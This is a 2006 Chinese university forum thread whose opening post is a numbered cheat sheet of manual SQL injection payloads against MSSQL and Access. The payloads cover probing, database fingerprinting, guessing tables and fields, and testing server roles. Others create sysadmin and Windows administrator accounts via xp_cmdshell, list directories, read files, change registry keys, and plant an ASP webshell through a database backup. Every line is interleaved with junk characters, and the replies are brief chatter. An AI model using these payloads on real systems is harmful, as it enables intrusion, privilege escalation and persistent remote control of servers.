社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4033阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 POZ5W)F(  
  2.初步判断是否是mssql ;and user>0 jS_fwuM  
*Cs RO  
  3.注入参数是字符'and [查询条件] and ''=' bU3e*Er  
(~}P.?C8  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' G:u-C<^'  
AHg:`Wjv-  
  5.判断数据库系统 /E(319u_  
mPhrMcL  
  ;and (select count(*) from sysobjects)>0 mssql 2QU ZBrs s  
bf#@YkE  
  ;and (select count(*) from msysobjects)>0 access q#}#A@Rg  
{\HEUIa]w  
x d9+P  
}cl~Vo-mp  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 km%c0:  
k`#OXLR  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 k)'y;{IN  
G {wIY"~4  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 960[.99  
n+ot. -  
  9.(1)猜字段的ascii值(access) rt5FecX\  
ape \zZCV  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 qM~;Q6{v  
+>v3&[lGv  
  (2)猜字段的ascii值(mssql) U^AywE]  
xK7xAO  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 4FWL\;6  
701mf1a  
  10.测试权限结构(mssql) m {dXN=  
6a_MA*XK  
UaW,#P  
@/(\YzQvp]  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?p&CR[  
]j=Eof%Rc  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- nTy8:k']  
U%<E9G594  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- A }(V2  
blUnAu o~  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- S-^:p5{r  
Bf)}g4nYn  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- DQ#rZi3I  
H<Ne\zAv  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- q?&Ap*  
3e)W_P*0?  
  ;and 1=(select IS_MEMBER('db_owner'));-- t[dOWgHi  
XBvJc'(s  
+-s$Htx  
eUY/H1  
  11.添加mssql和系统的帐户 { :^;byd  
-k4w$0)  
  ;exec master.dbo.sp_addlogin username;-- R]LRgfi9  
  ;exec master.dbo.sp_password null,username,password;-- 5o v F$qn  
,b b/ $   
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N9 SC\  
6}(; ~/L  
  ;exec master.dbo.xp_cmdshell 'net user username password V8C62X  
nBN+.RB:(  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 9)y7K%b0  
){D6E9  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- JY5)^<.d  
_S$ SL%;\  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--  xJ&E2Bf  
PUU "k:{  
QsO%m  
\/wbk`2  
  12.(1)遍历目录 C>}@"eK  
Q+ i  
  ;create table dirs(paths varchar(100), id int) z(o zMH  
uPbGQ:%}  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' t9QnEP'  
5 ]c\{G  
  ;and (select top 1 paths from dirs)>0 80'!XKSP  
y TbOBl  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) KxA ^?,t[  
5 R*  
>'/KOK"  
o(gEyK  
  (2)遍历目录 nq/SGo[c  
s%6{X48vY^  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- L  `\>_  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 , z-#B]  
9"g!J|+  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 (yr<B_Y'MY  
VB}4#-dG?  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 y E; n. L  
@P'("qb~  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 -;1nv:7Z3  
l KdY!j"  
Vf V|fuW  
 cFV)zFu  
  13.mssql中的存储过程 X2[d15!9  
2HX#:y{\l  
  xp_regenumvalues 注册表根键, 子键 i".nnAI:  
)j_Y9`R  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 [& d"Z2gK  
u/ Gk>F  
  xp_regread 根键,子键,键值名 \>G:mMk/  
0#/NZO  
  ;exec xp_regread U!TSAg21P  
E!s?amM4  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 R(1N]>  
rLKwuZ  
  xp_regwrite 根键,子键, 值名, 值类型, 值 `mt x+C  
17C"@1n-  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;_nV*G.y#^  
=/Lwprj  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 L>ruNw'-K  
_u] S/X-  
  xp_regdeletevalue 根键,子键,值名 <@](uWu  
n>o0PtGxC  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 o4U[;.?c  
Z'<I Is:J  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 R'z -#*[  
ir?Y>  
K^yZfpa8  
bC SgdK  
  14.mssql的backup创建webshell 5*#3v:l/9  
+ lNAog  
  use model 4iPxtVT  
X }""= S<  
  create table cmd(str image);  L7rEMq  
CKuf'h#  
  insert into cmd(str) values (''); 37U2Tb!y '  
qt.Y6s:r_  
  backup database model to disk='c:\l.asp'; gP^p7aYwn  
D8O&`!mf  
|bM?Q$>~  
}rKKIF^f\S  
  15.mssql内置函数 .B?J@,  
~USU\dni  
  ;and (select @@version)>0 获得Windows的版本号 9^zA(  
oScKL#Hu  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa r.vezsH  
* ak"}s  
  ;and (select user_name())>0 爆当前系统的连接用户 d^:(-2l-  
T!ik"YZ@i  
  ;and (select db_name())>0 得到当前连接的数据库 a{y"vVQOF  
0{k*SCN#  
4f-I,)qCBk  
O Bp&64  
  16.简洁的webshell W*!u_]K>  
!C>'a:  
  use model \)/dFo\l  
BK[ YX)  
  create table cmd(str image); M!#[(:  
lDf:~  
  insert into cmd(str) values (''); IV]2#;OO?  
fEYo<@5c]  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八